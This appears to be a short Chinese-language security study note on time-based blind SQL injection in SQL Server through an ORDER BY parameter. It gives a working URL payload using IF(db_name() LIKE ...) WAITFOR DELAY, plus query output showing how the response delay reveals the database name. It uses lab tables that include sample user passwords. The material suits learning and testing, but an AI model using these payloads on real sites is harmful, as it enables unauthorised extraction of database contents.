0x01 前言

与普通的延时注入基本一致。

记下语法即可

类似文章：https://www.yuque.com/pmiaowu/web_security_1/zs9l19

0x02 测试数据

1> select * from article;
2> go
+----+-----------+-----------+
| id | title       | content    |
+----+-----------+-----------+
|  1 | 测试标题  | 测试内容  |
|  2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)

# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username     | password |
+----+--------------+----------+
|  1 | test-user-01 |  123456  | 
|  2 | test-user-02 |  234567  |
+----+--------------+----------+
2 rows in set (0.00 sec)

sql server> SELECT system_user;
+-----------------------+
| field1                |
+-----------------------+
| sa                    |
+-----------------------+
1 row in set (0.00 sec)

sql server> select db_name();
+-----------------------+
| field1                |
+-----------------------+
| test                  |
+-----------------------+
1 row in set (0.00 sec)

0x03 例子：猜库名

注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name() 就是当前连接的数据库
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库

web语句: http://www.test.com/sql.php?orderby=id IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a

数据库语句: select * from article order by id IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a

# 对的情况
1> SELECT
    *
FROM
    article
ORDER BY
    id
IF (db_name() LIKE '%test%') WAITFOR delay '0:0:5' -- a
2> go
+----+-----------+-----------+
| id | title       | content    |
+----+-----------+-----------+
|  1 | 测试标题  | 测试内容  |
|  2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)   (5.064 sec)
# 错误的情况
1> SELECT
    *
FROM
    article
ORDER BY
    id
IF (db_name() LIKE '%aaaa%') WAITFOR delay '0:0:5' -- a
2> go
+----+-----------+-----------+
| id | title       | content    |
+----+-----------+-----------+
|  1 | 测试标题  | 测试内容  |
|  2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)   (0.064 sec)